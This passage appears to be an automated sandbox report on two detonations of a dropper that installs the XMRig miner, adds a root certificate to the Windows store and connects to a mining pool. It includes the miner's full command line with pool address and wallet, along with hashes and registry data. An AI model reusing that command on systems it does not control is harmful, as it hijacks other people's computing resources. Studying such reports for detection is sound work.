memory/4168-52-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-53-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-54-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-55-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-56-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-57-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-58-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-59-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-60-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-61-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-62-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-63-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-64-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-65-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-66-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-67-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-68-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-69-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-70-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-71-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-72-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-73-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-74-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-75-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-76-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-77-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-78-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-79-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-80-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-81-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-82-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-83-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-84-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4472 wrote to memory of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4472 wrote to memory of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2148-16-0x000001DD63BF0000-0x000001DD63C10000-memory.dmp
memory/2148-17-0x000001DD63C30000-0x000001DD63C50000-memory.dmp
memory/2148-18-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-20-0x000001DD63C70000-0x000001DD63C90000-memory.dmp
memory/2148-19-0x000001DD63C50000-0x000001DD63C70000-memory.dmp
memory/2148-21-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-22-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-25-0x000001DD63C70000-0x000001DD63C90000-memory.dmp
memory/2148-24-0x000001DD63C50000-0x000001DD63C70000-memory.dmp
memory/2148-23-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-26-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-27-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-28-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-29-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-30-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-31-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-32-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-33-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-34-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-35-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-36-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-37-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-38-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-39-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-40-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-41-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-42-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-43-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-44-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-45-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-46-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-47-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-48-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-49-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-50-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-51-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-52-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-53-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-54-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-55-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-56-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-57-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-58-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-59-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-60-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-61-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-62-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-63-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-64-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-65-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-66-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-67-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-68-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-69-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-70-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-71-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-72-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-73-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-74-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-75-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-76-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-77-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-78-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-79-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-80-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-81-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-82-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-83-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-84-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:10
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e06035